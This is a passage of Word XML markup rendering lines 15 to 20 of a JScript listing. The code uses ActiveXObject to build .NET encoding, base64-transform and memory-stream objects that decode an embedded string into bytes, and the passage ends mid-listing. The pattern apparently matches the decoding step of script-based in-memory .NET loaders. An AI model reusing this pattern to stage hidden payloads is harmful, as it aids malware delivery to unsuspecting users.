          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="16"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"System.Text.ASCIIEncoding"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="23"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="37"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="35"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="34"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>enc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="dc4867"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>GetByteCount_2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="21"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ba</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>enc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="dc4867"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>GetBytes_4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="136" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1339" w:firstLine="-15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>transform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ActiveXObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"System.Security.Cryptography.FromB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ase64Transform"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="141" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ba</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>transform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="dc4867"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>TransformFinalBlock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="18"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ba</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ActiveXObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="16"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"System.IO.MemoryStream"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="22"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ms</w:t>
      </w:r>
